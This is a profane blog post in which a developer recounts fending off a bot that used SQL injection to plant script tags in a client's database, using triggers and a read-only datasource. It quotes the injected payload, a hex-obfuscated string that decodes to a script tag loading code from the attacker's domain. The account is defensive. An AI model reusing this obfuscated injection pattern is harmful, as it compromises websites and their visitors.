Today was...invigorating... to say the least at my day job. We maintain a rather large code base for a client of ours that contained some older code in its deepest darkest nether-regions that allowed for some SQL injection to take place. Although I know I was likely fighting against some junk ass bot, it felt like my opponent was flesh and blood.

Here's how it went down:

BOT: Injects silly script tag

view plain print about
1<script>my lame ass portal full of shit</script>

or...
view plain print about
1<script>
2 var news="b20b3cb73b63b72b69b70b74b20b73b72b63b3db22b68b74b74b70b3ab2fb2fb70b6fb72b74b61b6cb2eb61b63b72b61b73b2eb69b6eb2fb6db6cb2eb70b68b70b22b3eb3cb2fb73b63b72b69b70b74b3e";
3 docs = news.replace(/b/g,'%');
4document.write(that var named docs that I'm not actually going to put in here...);
5 </script>

ME: finds no trace in CF error logs and sets up a kill script in SQL to remove junk, continues to look for the entry point.
BOT: Injects more crap. This time changing the script's contents.
ME: creates a trigger on the targeted table to remove on update/insert - suck a fat one. continues to look for entry point.
BOT: ...
BOT: ...
BOT: ...
BOT: modifies script tags just enough to bypass trigger checks.
ME: hm, how clever you piece of junk.
ME: locks down the site's datasource to read only and proceeds to setup read and read/write dsns, some regex find and replace goodness and...once again...suck it!

I do enjoy a good duel from time to time, but not when I've got shit to do. So, whoever you are "portal.acras.in" nice try, but not good enough. DIAF KKTHXBYE.